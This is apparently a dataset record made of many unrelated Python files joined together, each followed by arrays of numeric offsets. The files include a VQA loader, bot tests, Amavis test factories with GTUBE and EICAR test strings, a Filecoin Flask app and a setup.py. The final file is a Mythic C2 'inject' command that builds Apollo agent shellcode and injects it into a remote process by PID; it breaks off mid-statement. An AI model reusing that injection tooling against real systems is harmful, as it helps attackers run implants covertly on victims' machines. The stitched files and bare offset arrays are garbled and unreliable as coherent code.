            # TODO: is this the correct ann_file?
ann_file = Path(args.vqa2_ann_path) / f"finetune_vqa2_minival.json"
return VQAv2QuestionAnswering(
img_dir / "val2014",
ann_file,
transforms=make_coco_transforms(image_set, cautious=True),
return_masks=args.masks,
return_tokens=True,
tokenizer=tokenizer,
ann_folder=Path(args.vqa2_ann_path),
)
elif image_set in ["test", "testdev", "trainval"]:
ann_file = Path(args.vqa2_ann_path) / f"finetune_vqa2_{image_set}.json"
return VQAv2QuestionAnswering(
img_dir / "test2015",
ann_file,
transforms=make_coco_transforms("val", cautious=True),
return_masks=args.masks,
return_tokens=True,
tokenizer=tokenizer,
ann_folder=Path(args.vqa2_ann_path),
)
else:
assert False, f"Unknown image set {image_set}"
| [
[
[
262,
266
],
[
987,
991
],
[
1110,
1114
]
],
[
[
287,
291
],
[
3392,
3396
],
[
3812,
3816
],
[
4329,
4333
],
[
4556,
4560
],
[
4936,
4940
],
[
5058,
5062
],
[
5439,
5443
]
],
[
[
300,
305
],
[
1990,
1995
],
[
2036,
2041
],
[
2080,
2085
],
[
2141,
2146
],
[
2438,
2443
],
[
2576,
2581
],
[
2789,
2794
],
[
2927,
2932
],
[
3138,
3143
],
[
3274,
3279
],
[
4415,
4420
]
],
[
[
313,
324
],
[
537,
548
]
],
[
[
350,
370
],
[
3514,
3534
]
],
[
[
390,
412
],
[
820,
842
]
],
[
[
414,
432
],
[
477,
495
]
],
[
[
434,
454
],
[
4108,
4128
],
[
4747,
4767
],
[
5254,
5274
]
],
[
[
462,
476
]
],
[
[
514,
536
],
[
698,
720
],
[
1246,
1268
],
[
3923,
3945
],
[
4633,
4655
],
[
5139,
5161
]
],
[
[
3330,
3335
]
]
] |
from assertpy import assert_that
from httmock import HTTMock
from sahyun_bot.commands.admin import Index, Rank
from sahyun_bot.users_settings import UserRank
from tests.mock_customsforge import customsforge
def test_require_admin(commander, hook):
for command in ['!lock', '!index', '!rank']:
with commander.executest(hook, command, 'goodlikebot'):
hook.assert_silent_failure()
def test_lock_unlock(commander, hook):
with commander.executest(hook, '!lock'):
hook.assert_success('Bot is now in ADMIN only mode')
# even basic commands are unauthorized
with commander.executest(hook, '!time', 'goodlikebot'):
hook.assert_silent_failure()
with commander.executest(hook, '!lock'):
hook.assert_success('Bot no longer in ADMIN only mode')
# functionality restored
with commander.executest(hook, '!time', 'goodlikebot'):
hook.assert_success()
def test_index(tl, hook):
with HTTMock(customsforge), Index(tl=tl).executest(hook):
hook.assert_success('CDLCs indexed')
tl.set_use_elastic(False)
with HTTMock(customsforge), Index(tl=tl).executest(hook):
hook.assert_failure('CDLCs could not be indexed')
def test_rank(users, hook):
with Rank(us=users).executest(hook, args=''):
hook.assert_failure('Try !rank RANK NICK')
with Rank(us=users).executest(hook, args='just_rank'):
hook.assert_failure('Try !rank RANK NICK')
with Rank(us=users).executest(hook, args='BAD_RANK goodlikebot'):
hook.assert_failure('BAD_RANK is not a valid rank')
with Rank(us=users).executest(hook, args='BAN goodlikebot'), users._manual('goodlikebot'):
hook.assert_success('goodlikebot is now BAN')
assert_that(users.rank('goodlikebot')).is_equal_to(UserRank.BAN)
users.set_use_elastic(False)
with Rank(us=users).executest(hook, args='ADMIN goodlikebot'):
hook.assert_failure('Rank could not be set')
def test_rank_shorthand(commander, hook):
with commander.executest(hook, '!ban goodlikebot'), commander._users._manual('goodlikebot'):
hook.assert_success('goodlikebot is now BAN')
assert_that(commander._users.rank('goodlikebot')).is_equal_to(UserRank.BAN)
| [
[
[
21,
32
],
[
1741,
1752
],
[
2164,
2175
]
],
[
[
53,
60
],
[
960,
967
],
[
1099,
1106
]
],
[
[
100,
105
],
[
983,
988
],
[
1122,
1127
]
],
[
[
107,
111
],
[
1249,
1253
],
[
1351,
1355
],
[
1462,
1466
],
[
1593,
1597
],
[
1850,
1854
]
],
[
[
150,
158
],
[
1792,
1800
],
[
2226,
2234
]
],
[
[
195,
207
],
[
968,
980
],
[
1107,
1119
]
],
[
[
214,
232
]
],
[
[
411,
427
]
],
[
[
929,
939
]
],
[
[
1216,
1225
]
],
[
[
1967,
1986
]
]
] |
import os
import base64
from simpleutil.utils import digestutils
from goperation.filemanager import LocalFile
from goperation.manager.rpc.agent.application.taskflow.middleware import EntityMiddleware
from goperation.manager.rpc.agent.application.taskflow.database import Database
from goperation.manager.rpc.agent.application.taskflow.application import AppUpgradeFile
from goperation.manager.rpc.agent.application.taskflow.application import AppLocalBackupFile
from gogamechen3.api import gfile
class GogameMiddle(EntityMiddleware):
def __init__(self, entity, endpoint, objtype):
super(GogameMiddle, self).__init__(entity, endpoint)
self.objtype = objtype
self.databases = {}
self.waiter = None
class GogameDatabase(Database):
def __init__(self, **kwargs):
super(GogameDatabase, self).__init__(**kwargs)
self.database_id = kwargs.get('database_id')
self.source = kwargs.get('source')
self.rosource = kwargs.get('rosource')
self.subtype = kwargs.get('subtype')
self.ro_user = kwargs.get('ro_user')
self.ro_passwd = kwargs.get('ro_passwd')
class GogameAppFile(AppUpgradeFile):
def __init__(self, source, objtype, revertable=False, rollback=False,
stream=None):
super(GogameAppFile, self).__init__(source, revertable, rollback)
self.objtype = objtype
self.stream = stream
def post_check(self):
gfile.check(self.objtype, self.file)
def clean(self):
if self.stream:
os.remove(self.file)
def prepare(self, middleware=None, timeout=None):
if self.stream:
if len(self.stream) > 5000:
raise ValueError("Strem over size")
file_path = os.path.join('/tmp', '%s.zip' % self.source)
data = base64.b64decode(self.stream)
if digestutils.strmd5(data) != self.source:
raise ValueError('Md5 not match')
with open(file_path, 'wb') as f:
data = base64.b64decode(self.stream)
f.write(data)
self.localfile = LocalFile(file_path, self.source, len(data))
else:
self.localfile = middleware.filemanager.get(self.source, download=True, timeout=timeout)
try:
self.post_check()
except Exception:
localfile = self.localfile
self.localfile = None
if self.stream:
os.remove(localfile.path)
else:
middleware.filemanager.delete(self.source)
raise
class GogameAppBackupFile(AppLocalBackupFile):
def __init__(self, destination, objtype):
super(GogameAppBackupFile, self).__init__(destination,
exclude=gfile.CompressConfAndLogExcluder(),
topdir=False,
native=True)
self.objtype = objtype
def post_check(self):
gfile.check(self.objtype, self.file)
| [
[
[
7,
9
],
[
1552,
1554
],
[
1768,
1770
],
[
2471,
2473
]
],
[
[
17,
23
],
[
1832,
1838
],
[
2036,
2042
]
],
[
[
54,
65
],
[
1877,
1888
]
],
[
[
102,
111
],
[
2125,
2134
]
],
[
[
185,
201
],
[
520,
536
]
],
[
[
273,
281
],
[
761,
769
]
],
[
[
356,
370
],
[
1165,
1179
]
],
[
[
445,
463
],
[
2620,
2638
]
],
[
[
493,
498
],
[
1457,
1462
],
[
2809,
2814
],
[
3038,
3043
]
],
[
[
507,
519
],
[
605,
617
]
],
[
[
746,
760
],
[
820,
834
]
],
[
[
1151,
1164
],
[
1302,
1315
]
],
[
[
2600,
2619
],
[
2702,
2721
]
]
] |
#!/usr/bin/env python3
# XML API, for dealing with XML strings
# -*- coding: utf-8 -*-
__all__ = ['parseargs', 'collect']
'<users>\n\t<user>\n\t\t<id>1</id>\n\t\t<name>Fred</name>\n\t\t<salary>500000</salary>\n\t</user>\n\t<user>\n\t\t<id>1</id>\n\t\t<name>ScienceCat</name>\n\t\t<salary>500000</salary>\n\t</user>\n\t<user>\n\t\t<id>1</id>\n\t\t<name>Bob</name>\n\t\t<salary>500000</salary>\n\t</user>\n</users>'
xmlex = '<users>\n<user>\n<id>1</id>\n<name>Fred</name>\n<salary>500000</salary>\n</user>\n<user>\n<id>1</id>\n<name>ScienceCat</name>\n<salary>500000</salary>\n</user>\n<user>\n<id>1</id>\n<name>Bob</name>\n<salary>500000</salary>\n</user>\n</users>'
argex = 'cats="True and Sand" true=\'Cats two\' sand="graval"'
import re
##import xml.etree.cElementTree as xml
def parseargs(string:str):
"""Split a given string into individual arguments, seperated into key:arg for <key>=(' or ")<arg>(same char as start)"""
arg = {}
# ([%-%w]+)=([\"'])(.-)%2
# '([\w]+)=([\"\'])(.*)'
# '([-\w]+)=([\"\']*)'
## pattern = re.compile('([\w]+)=([\"\'])(.*)')
## print(pattern)
## for match in re.findall(pattern, string):
## print(match)
parts = string.split(' ')
bkey = ''
buffer = ''
end = '"'
for part in parts:
if '=' in part:
key, vp = part.split('=')
if vp[0] in ('"', "'"):
end = vp[0]
if vp.endswith(end):
arg[key] = vp[1:-1]
else:
bkey = key
buffer += vp
elif part.endswith(end):
buffer += ' '+part
arg[bkey] = buffer[1:-1]
bkey, buffer = '', ''
else:
buffer += ' '+part
return arg
def collect(string:str):
stack = []
top = []
stack.append(top)
i, j = 0, 0
class elementTag:
def __init__(self, label, xargs, empty=0):
self.label = label
self.xargs = xargs
self.empty = empty
    # Find each tag of the form <name ...>, </name> or <name .../> and build a
    # nested list structure of elementTag objects and text fragments.
    tag_pattern = re.compile(r'<(/?)([\w:]+)(.*?)(/?)>', re.DOTALL)
    while True:
        match = tag_pattern.search(string, i)
        if not match:
            break
        ni, j = match.start(), match.end()
        c, label, xarg, empty = match.groups()
        text = string[i:ni]
        if text.strip():
            top.append(text)
        if empty == '/':  # empty element tag
            top.append(elementTag(label, parseargs(xarg), 1))
        elif c == '':  # start tag: open a new level
            top = [elementTag(label, parseargs(xarg))]
            stack.append(top)
        else:  # end tag: close the current level
            toclose = stack.pop()
            if len(stack) < 1:
                raise ValueError(f'Nothing to close with {label}.')
            if toclose and isinstance(toclose[0], elementTag) and toclose[0].label != label:
                raise ValueError(f'Trying to close {toclose[0].label} with {label}.')
            top = stack[-1]
            top.append(toclose)
        i = j
    # Keep any trailing text after the last tag and return the root level.
    text = string[i:]
    if text.strip():
        stack[0].append(text)
    return stack[0]
| [
[
[
88,
95
]
],
[
[
416,
421
]
],
[
[
668,
673
]
],
[
[
788,
797
],
[
2303,
2312
],
[
2395,
2404
]
],
[
[
1749,
1756
]
]
] |
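A quick check (not part of the original record) of parseargs on the argex sample defined in that snippet; each key maps to the text between its quote characters:
print(parseargs(argex))
# {'cats': 'True and Sand', 'true': 'Cats two', 'sand': 'graval'}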
import json
import logging
from sqlalchemy import Column, Integer, String, Float, DateTime, Boolean, func
from iotfunctions import bif
from ai.functions import SimpleAnomaly
from iotfunctions.metadata import EntityType
from iotfunctions.db import Database
from iotfunctions.enginelog import EngineLogging
from custom import settings
EngineLogging.configure_console_logging(logging.DEBUG)
'''
# Replace with a credentials dictionary or provide a credentials file.
# Explore > Usage > Watson IOT Platform Analytics > Copy to clipboard
# Paste the contents into a json file.
'''
#with open('credentials_Monitor-Demo.json', encoding='utf-8') as F:
#with open('credentials.json', encoding='utf-8') as F:
with open('credentials_dev2.json', encoding='utf-8') as F:
credentials = json.loads(F.read())
'''
Developing Test Pipelines
-------------------------
When creating a set of functions, you can test how these functions will
work together by creating a test pipeline.
'''
'''
Create a database object to access Watson IOT Platform Analytics DB.
'''
db = Database(credentials = credentials)
db_schema = None # set if you are not using the default
'''
To do anything with IoT Platform Analytics, you will need one or more entity types.
You can create entity types through the IoT Platform or using the python API as shown below.
The database schema is only needed if you are not using the default schema. You can also rename the timestamp.
'''
entity_name = 'Turbines'
# dash100462 Used in dev2
db_schema = 'dash100462'
# db_schema = None # replace if you are not using the default schema
db.drop_table(entity_name, schema = db_schema)
entity = EntityType(entity_name,db,
Column('TURBINE_ID',String(50)),
Column('TEMPERATURE',Float()),
Column('PRESSURE',Float()),
Column('VOLUME', Float()),
SimpleAnomaly(request='GET',
url='internal_test',
output_item = 'http_preload_done'),
bif.PythonExpression(expression='df["TEMPERATURE"]*df["PRESSURE"]',
output_name = 'VOLUME'),
**{
'_timestamp' : 'evt_timestamp',
'_db_schema' : db_schema
})
'''
When creating an EntityType object you will need to specify the name of the entity and the database
object that will contain the entity data.
After creating an EntityType you will need to register it so that it is visible in the UI.
To also register the functions and constants associated with the entity type, specify
'publish_kpis' = True.
'''
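# Per the note above, passing publish_kpis=True to register() would also publish the entity's
# functions and constants (hedged: exact keyword support depends on the installed iotfunctions version).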
entity.register(raise_error=False)
db.register_functions([SimpleAnomaly])
'''
To test the execution of kpi calculations defined for the entity type locally
use 'test_local_pipeline'.
A local test will not update the server job log or write kpi data to the AS data
lake. Instead kpi data is written to the local filesystem in csv form.
'''
entity.exec_local_pipeline()
'''
view entity data
'''
df = db.read_table(table_name=entity_name, schema=db_schema)
print(df.head())
| [
[
[
7,
11
],
[
765,
769
]
],
[
[
19,
26
],
[
374,
381
]
],
[
[
50,
56
],
[
1690,
1696
],
[
1743,
1749
],
[
1794,
1800
],
[
1842,
1848
]
],
[
[
58,
65
]
],
[
[
67,
73
],
[
1710,
1716
]
],
[
[
75,
80
],
[
1764,
1769
],
[
1812,
1817
],
[
1859,
1864
]
],
[
[
82,
90
]
],
[
[
92,
99
]
],
[
[
101,
105
]
],
[
[
131,
134
],
[
2067,
2070
]
],
[
[
160,
173
],
[
1889,
1902
],
[
2748,
2761
]
],
[
[
208,
218
],
[
1643,
1653
]
],
[
[
247,
255
],
[
1050,
1058
]
],
[
[
291,
304
],
[
334,
347
]
],
[
[
324,
332
]
],
[
[
744,
745
],
[
776,
777
]
],
[
[
751,
762
],
[
1073,
1084
]
],
[
[
1045,
1047
],
[
1586,
1588
],
[
1666,
1668
],
[
2725,
2727
],
[
3092,
3094
]
],
[
[
1086,
1095
]
],
[
[
1439,
1450
],
[
1600,
1611
],
[
1654,
1665
],
[
3117,
3128
]
],
[
[
1491,
1500
],
[
1622,
1631
],
[
2316,
2325
],
[
3137,
3146
]
],
[
[
1634,
1640
],
[
2690,
2696
],
[
3031,
3037
]
],
[
[
3087,
3089
],
[
3154,
3156
]
]
] |
# -*- coding: utf-8 -*-
"""Amavis factories."""
from __future__ import unicode_literals
import datetime
import time
import factory
from . import models
from .utils import smart_bytes
SPAM_BODY = """X-Envelope-To: <{rcpt}>
X-Envelope-To-Blocked: <{rcpt}>
X-Quarantine-ID: <nq6ekd4wtXZg>
X-Spam-Flag: YES
X-Spam-Score: 1000.985
X-Spam-Level: ****************************************************************
X-Spam-Status: Yes, score=1000.985 tag=2 tag2=6.31 kill=6.31
tests=[ALL_TRUSTED=-1, GTUBE=1000, PYZOR_CHECK=1.985]
autolearn=no autolearn_force=no
Received: from demo.modoboa.org ([127.0.0.1])
by localhost (demo.modoboa.org [127.0.0.1]) (amavisd-new, port 10024)
with ESMTP id nq6ekd4wtXZg for <user@demo.local>;
Thu, 9 Nov 2017 15:59:52 +0100 (CET)
Received: from demo.modoboa.org (localhost [127.0.0.1])
by demo.modoboa.org (Postfix) with ESMTP
for <user@demo.local>; Thu, 9 Nov 2017 15:59:52 +0100 (CET)
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: base64
Subject: Sample message
From: {sender}
To: {rcpt}
Message-ID: <151023959268.5550.5713670714483771838@demo.modoboa.org>
Date: Thu, 09 Nov 2017 15:59:52 +0100
This is the GTUBE, the
Generic
Test for
Unsolicited
Bulk
Email
If your spam filter supports it, the GTUBE provides a test by which you
can verify that the filter is installed correctly and is detecting incoming
spam. You can send yourself a test mail containing the following string of
characters (in upper case and with no white spaces and line breaks):
XJS*C4JDBQADN1.NSBN3*2IDNEN*GTUBE-STANDARD-ANTI-UBE-TEST-EMAIL*C.34X
You should send this test mail from an account outside of your network.
"""
VIRUS_BODY = """Subject: Virus Test Message (EICAR)
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="huq684BweRXVnRxX"
Content-Disposition: inline
Date: Sun, 06 Nov 2011 10:08:18 -0800
--huq684BweRXVnRxX
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
This is a virus test message. It contains an attached file 'eicar.com',
which contains the EICAR virus <http://eicar.org/86-0-Intended-use.html>
test pattern.
--huq684BweRXVnRxX
Content-Type: application/x-msdos-program
Content-Disposition: attachment; filename="eicar.com"
Content-Transfer-Encoding: quoted-printable
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*=0A
--huq684BweRXVnRxX--
"""
class MaddrFactory(factory.django.DjangoModelFactory):
"""Factory for Maddr."""
class Meta:
model = models.Maddr
django_get_or_create = ("email", )
id = factory.Sequence(lambda n: n) # NOQA:A003
email = factory.Sequence(lambda n: "user_{}@domain.test".format(n))
domain = "test.domain"
class MsgsFactory(factory.django.DjangoModelFactory):
"""Factory for Mailaddr."""
class Meta:
model = models.Msgs
mail_id = factory.Sequence(lambda n: "mailid{}".format(n))
secret_id = factory.Sequence(lambda n: smart_bytes("id{}".format(n)))
sid = factory.SubFactory(MaddrFactory)
client_addr = "127.0.0.1"
originating = "Y"
dsn_sent = "N"
subject = factory.Sequence(lambda n: "Test message {}".format(n))
time_num = factory.LazyAttribute(lambda o: int(time.time()))
time_iso = factory.LazyAttribute(
lambda o: datetime.datetime.fromtimestamp(o.time_num).isoformat())
size = 100
class MsgrcptFactory(factory.django.DjangoModelFactory):
"""Factory for Msgrcpt."""
class Meta:
model = models.Msgrcpt
rseqnum = 1
is_local = "Y"
bl = "N"
wl = "N"
mail = factory.SubFactory(MsgsFactory)
rid = factory.SubFactory(MaddrFactory)
class QuarantineFactory(factory.django.DjangoModelFactory):
"""Factory for Quarantine."""
class Meta:
model = models.Quarantine
chunk_ind = 1
mail = factory.SubFactory(MsgsFactory)
def create_quarantined_msg(rcpt, sender, rs, body, **kwargs):
"""Create a quarantined msg."""
msgrcpt = MsgrcptFactory(
rs=rs,
rid__email=rcpt,
rid__domain="com.test", # FIXME
mail__sid__email=smart_bytes(sender),
mail__sid__domain="", # FIXME
**kwargs
)
QuarantineFactory(
mail=msgrcpt.mail,
        mail_text=smart_bytes(body)  # store the body that was passed in (e.g. VIRUS_BODY for viruses)
)
return msgrcpt
def create_spam(rcpt, sender="spam@evil.corp", rs=" "):
"""Create a spam."""
body = SPAM_BODY.format(rcpt=rcpt, sender=sender)
body += "fóó bár"
return create_quarantined_msg(
rcpt, sender, rs, body, bspam_level=999.0, content="S")
def create_virus(rcpt, sender="virus@evil.corp", rs=" "):
"""Create a virus."""
return create_quarantined_msg(rcpt, sender, rs, VIRUS_BODY, content="V")
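# Usage sketch (requires a configured Django test database for the factories above):
#   spam_rcpt = create_spam("user@demo.local")     # quarantined GTUBE spam for this recipient
#   virus_rcpt = create_virus("user@demo.local")   # quarantined EICAR test message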
| [
[
[
73,
89
]
],
[
[
98,
106
],
[
3354,
3362
]
],
[
[
114,
118
],
[
3284,
3288
]
],
[
[
127,
134
],
[
2472,
2479
],
[
2636,
2643
],
[
2691,
2698
],
[
2798,
2805
],
[
2926,
2933
],
[
2991,
2998
],
[
3059,
3066
],
[
3177,
3184
],
[
3248,
3255
],
[
3313,
3320
],
[
3449,
3456
],
[
3637,
3644
],
[
3679,
3686
],
[
3738,
3745
],
[
3889,
3896
]
],
[
[
150,
156
],
[
2570,
2576
],
[
2899,
2905
],
[
3549,
3555
],
[
3841,
3847
]
],
[
[
176,
187
],
[
3018,
3029
],
[
4157,
4168
],
[
4308,
4319
]
],
[
[
189,
198
],
[
4320,
4329
],
[
4483,
4492
]
],
[
[
1744,
1754
],
[
4785,
4795
]
],
[
[
2459,
2471
],
[
3078,
3090
],
[
3698,
3710
]
],
[
[
2786,
2797
],
[
3656,
3667
],
[
3908,
3919
]
],
[
[
3434,
3448
],
[
4035,
4049
]
],
[
[
3720,
3737
],
[
4244,
4261
]
],
[
[
3927,
3949
],
[
4559,
4581
],
[
4744,
4766
]
],
[
[
4395,
4406
]
],
[
[
4653,
4665
]
]
] |
#!/usr/bin/env python
from __future__ import print_function, division
import os, sys
import matplotlib.pyplot as plt
import numpy as np
import argparse
from astropy import log
from os import path
from glob import glob
from subprocess import check_call
import shutil
from astropy.table import Table
from astropy.io import fits
from nicer.values import *
from nicer.plotutils import plot_light_curve
def runcmd(cmd):
# CMD should be a list of strings since it is not processed by a shell
log.info('CMD: '+" ".join(cmd))
os.system(" ".join(cmd))
## Some ftools calls don't work properly with check_call...not sure why!
## so I am using os.system instead of check_call
#check_call(cmd,env=os.environ)
################################################
# Checking the presence of HEASOFT
try:
check_call('nicerversion',env=os.environ)
except:
print("You need to initialize FTOOLS/HEASOFT first (e.g., type 'heainit')!", file=sys.stderr)
exit()
################################################
# Checking the presence of gti header and columns in data/
gticolumns = path.join(datadir,'gti_columns.txt')
gtiheader = path.join(datadir,'gti_header.txt')
if not os.path.isfile(gtiheader) or not os.path.isfile(gticolumns):
log.error('The files gti_header.txt or gti_columns.txt are missing. Check the {} directory'.format(os.path.abspath(datadir)))
exit()
desc = """
Create a simple GTI file from a pair of NICER METs. This is handy as an input file to niextract-events timefile=xxx.gti
"""
parser = argparse.ArgumentParser(description = desc)
parser.add_argument("startmet", help="Starting MET for GTI", type=float)
parser.add_argument("stopmet", help="Ending MET for GTI", type=float)
parser.add_argument("--gtiname", help="Name of output GTI FITS file (default gti.fits)", default="gti.fits")
args = parser.parse_args()
################################################
## STEP 5 - dumping the TSTART and TEND into text file
import tempfile
fp = tempfile.NamedTemporaryFile(mode='w')  # text mode, so the formatted string below also works on Python 3
fp.write('{0} {1}\n'.format(args.startmet,args.stopmet))
fp.flush()
################################################
## STEP 6 - Making the GTI file from the text file
log.info("Making the GTI file gti.fits from the GTI data textfile")
cmd = ['ftcreate', '{}'.format(gticolumns), fp.name, args.gtiname, 'headfile={}'.format(gtiheader), 'extname="GTI"', 'clobber=yes']
runcmd(cmd)
fp.close()
| [
[
[
45,
59
]
],
[
[
61,
69
]
],
[
[
77,
79
],
[
847,
849
],
[
1191,
1193
],
[
1224,
1226
],
[
1356,
1358
],
[
532,
534
]
],
[
[
81,
84
],
[
953,
956
]
],
[
[
92,
116
]
],
[
[
124,
135
]
],
[
[
143,
151
],
[
1540,
1548
]
],
[
[
172,
175
],
[
1256,
1259
],
[
2190,
2193
],
[
496,
499
]
],
[
[
191,
195
],
[
1098,
1102
],
[
1147,
1151
]
],
[
[
213,
217
]
],
[
[
241,
251
],
[
817,
827
]
],
[
[
259,
265
]
],
[
[
292,
297
]
],
[
[
321,
325
]
],
[
[
352,
353
],
[
1108,
1115
],
[
1157,
1164
],
[
1372,
1379
]
],
[
[
382,
398
]
],
[
[
404,
410
],
[
2390,
2396
]
],
[
[
1085,
1095
],
[
1239,
1249
],
[
2289,
2299
]
],
[
[
1135,
1144
],
[
1206,
1215
],
[
2346,
2355
]
],
[
[
1396,
1400
],
[
1578,
1582
]
],
[
[
1531,
1537
],
[
1584,
1590
],
[
1657,
1663
],
[
1727,
1733
],
[
1844,
1850
]
],
[
[
1837,
1841
],
[
2048,
2052
],
[
2062,
2066
],
[
2311,
2315
]
],
[
[
1976,
1984
],
[
1990,
1998
]
],
[
[
1985,
1987
],
[
2020,
2022
],
[
2077,
2079
],
[
2302,
2304
],
[
2403,
2405
]
],
[
[
2258,
2261
],
[
2397,
2400
]
]
] |
import os
from datetime import datetime
from flask import Flask, render_template, flash, safe_join, send_file
from flask_user import login_required, current_user
from werkzeug.utils import secure_filename
from pygate_grpc.client import PowerGateClient
from deplatformr.models.filecoin_models import Ffs, Files, Logs
from deplatformr import app, db
@app.route('/filecoin-files')
@login_required
def filecoin_files():
files = Files.query.filter_by(user_id=current_user.id).all()
return render_template("filecoin/filecoin-files.html", files=files, breadcrumb="Filecoin / Files")
@app.route("/filecoin-download/<cid>", methods=["GET"])
@login_required
def filecoin_download(cid):
"""
Retrieve a file from Filecoin via IPFS using Powergate and offer the user
the option to save it to their machine.
"""
# Retrieve File and FFS info using the CID
file = Files.query.filter_by(CID=cid, user_id=current_user.id).first()
ffs = Ffs.query.get(file.ffs_id)
try:
# Retrieve data from Filecoin
powergate = PowerGateClient(app.config["POWERGATE_ADDRESS"])
data_ = powergate.ffs.get(file.CID, ffs.token)
# Save the downloaded data as a file
# Use the user data directory configured for the app
user_data = app.config["USER_DATA_DIR"]
if not os.path.exists(user_data):
os.makedirs(user_data)
print(user_data)
# Create a subdirectory per username. Usernames are unique.
user_dir = os.path.join(
user_data, str(current_user.id) + "-" + current_user.username)
if not os.path.exists(user_dir):
os.makedirs(user_dir)
print(user_dir)
# Create a Filecoin downloads subdirectory.
filecoin_dir = os.path.join(user_dir, "filecoin/downloads")
if not os.path.exists(filecoin_dir):
os.makedirs(filecoin_dir)
print(filecoin_dir)
with open(os.path.join(filecoin_dir, file.file_name), "wb") as out_file:
# Iterate over the data byte chunks and save them to an output file
for data in data_:
out_file.write(data)
# Create path to download file
safe_path = safe_join("../" + filecoin_dir, file.file_name)
print(safe_path)
# Offer the file for download to local machine
return send_file(safe_path, as_attachment=True)
# TODO: CLEAR CACHED FILES IN DOWNLOAD DIRECTORY
except Exception as e:
# Output error message if download from Filecoin fails
flash("failed to download '{}' from Filecoin. {}".format(
file.file_name, e), "alert-danger")
# Update log table with error
event = Logs(
timestamp=datetime.now().replace(microsecond=0),
event="Download ERROR: "
+ file.file_name
+ " CID: "
+ file.CID
+ " "
+ str(e),
user_id=current_user.id,
)
db.session.add(event)
db.session.commit()
files = Files.query.filter_by(user_id=current_user.id).all()
return render_template("filecoin/filecoin-files.html", files=files, breadcrumb="Filecoin / Files")
@app.route('/filecoin-wallets')
@login_required
def filecoin_wallets():
"""
Retrieve all wallets from all FFSes and save them in a list for
presentation on the UI template
"""
powergate = PowerGateClient(app.config["POWERGATE_ADDRESS"])
try:
ffs = Ffs.query.filter_by(user_id=current_user.id).one()
except:
flash("No wallets created yet.", "alert-danger")
return render_template("filecoin/filecoin-wallets.html", wallets=None, breadcrumb="Filecoin / Wallets")
wallets = []
addresses = powergate.ffs.addrs_list(ffs.token)
for address in addresses.addrs:
balance = powergate.wallet.balance(address.addr)
wallets.append(
{
"ffs": ffs.ffs_id,
"name": address.name,
"address": address.addr,
"type": address.type,
"balance": str(balance.balance),
}
)
return render_template("filecoin/filecoin-wallets.html", wallets=wallets, breadcrumb="Filecoin / Wallets")
| [
[
[
7,
9
],
[
1330,
1332
],
[
1369,
1371
],
[
1505,
1507
],
[
1609,
1611
],
[
1647,
1649
],
[
1768,
1770
],
[
1828,
1830
],
[
1870,
1872
],
[
1942,
1944
]
],
[
[
31,
39
],
[
2744,
2752
]
],
[
[
58,
63
]
],
[
[
65,
80
],
[
496,
511
],
[
3118,
3133
],
[
3631,
3646
],
[
4168,
4183
]
],
[
[
82,
87
],
[
2555,
2560
],
[
3567,
3572
]
],
[
[
89,
98
],
[
2213,
2222
]
],
[
[
100,
109
],
[
2357,
2366
]
],
[
[
133,
147
],
[
381,
395
],
[
647,
661
],
[
3247,
3261
]
],
[
[
149,
161
],
[
461,
473
],
[
926,
938
],
[
1546,
1558
],
[
1571,
1583
],
[
2955,
2967
],
[
3083,
3095
],
[
3524,
3536
]
],
[
[
189,
204
]
],
[
[
236,
251
],
[
1056,
1071
],
[
3423,
3438
]
],
[
[
299,
302
],
[
961,
964
],
[
3496,
3499
]
],
[
[
304,
309
],
[
431,
436
],
[
887,
892
],
[
3053,
3058
]
],
[
[
311,
315
],
[
2716,
2720
]
],
[
[
340,
343
],
[
351,
354
],
[
591,
594
],
[
3214,
3217
],
[
1072,
1075
],
[
1287,
1290
],
[
3439,
3442
]
],
[
[
345,
347
],
[
2990,
2992
],
[
3020,
3022
]
],
[
[
400,
414
]
],
[
[
666,
683
]
],
[
[
3266,
3282
]
]
] |
from setuptools import find_packages, setup
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name='msnexport',
version='0.1',
license="MIT",
classifiers=["Programming Language :: Python :: 3.7"],
author='Charles Marceau',
author_email='charlesmarceau3@gmail.com',
description='Export your old xml MSN history to pdf.',
long_description=long_description,
long_description_content_type="text/markdown",
url='https://github.com/charles-marceau/msnexport',
packages=find_packages(),
include_package_data=True,
install_requires=[
'beautifulsoup4',
'click',
'lxml',
'reportlab'
],
entry_points='''
[console_scripts]
msnexport=msnexport.cli:export
'''
)
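# After installation (e.g. `pip install .`), the [console_scripts] entry point above exposes
# the `msnexport` command, which dispatches to msnexport.cli:export.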
| [
[
[
23,
36
],
[
534,
547
]
],
[
[
38,
43
],
[
114,
119
]
],
[
[
76,
78
],
[
103,
105
]
],
[
[
84,
100
],
[
396,
412
]
]
] |
from mythic_payloadtype_container.MythicCommandBase import *
import json
from mythic_payloadtype_container.MythicRPC import *
import base64
import asyncio  # used by the polling loop in create_tasking below
class InjectArguments(TaskArguments):
def __init__(self, command_line):
super().__init__(command_line)
self.args = {
"template": CommandParameter(name="Payload Template", type=ParameterType.Payload, supported_agents=["apollo"], supported_agent_build_parameters={"apollo": {"output_type": "Shellcode"}}),
"pid": CommandParameter(name="PID", type=ParameterType.Number),
}
errorMsg = "Missing required parameter: {}"
async def parse_arguments(self):
if (self.command_line[0] != "{"):
raise Exception("Inject requires JSON parameters and not raw command line.")
self.load_args_from_json_string(self.command_line)
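        # Example of accepted input (illustrative values only):
        #   {"template": "my_apollo_shellcode_payload", "pid": 1234}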
class InjectCommand(CommandBase):
cmd = "inject"
needs_admin = False
help_cmd = "inject (modal popup)"
description = "Inject agent shellcode into a remote process."
version = 2
is_exit = False
is_file_browse = False
is_process_list = False
is_download_file = False
is_upload_file = False
is_remove_file = False
script_only = True
author = "@djhohnstein"
argument_class = InjectArguments
attackmapping = ["T1055"]
async def shinject_completed(self, task: MythicTask, subtask: dict = None, subtask_group_name: str = None) -> MythicTask:
task.status = MythicStatus.Completed
return task
async def create_tasking(self, task: MythicTask) -> MythicTask:
temp = await MythicRPC().execute("get_payload",
payload_uuid=task.args.get_arg("template"))
gen_resp = await MythicRPC().execute("create_payload_from_uuid",
task_id=task.id,
payload_uuid=task.args.get_arg('template'),
new_description="{}'s injection into PID {}".format(task.operator, str(task.args.get_arg("pid"))))
if gen_resp.status == MythicStatus.Success:
# we know a payload is building, now we want it
while True:
resp = await MythicRPC().execute("get_payload",
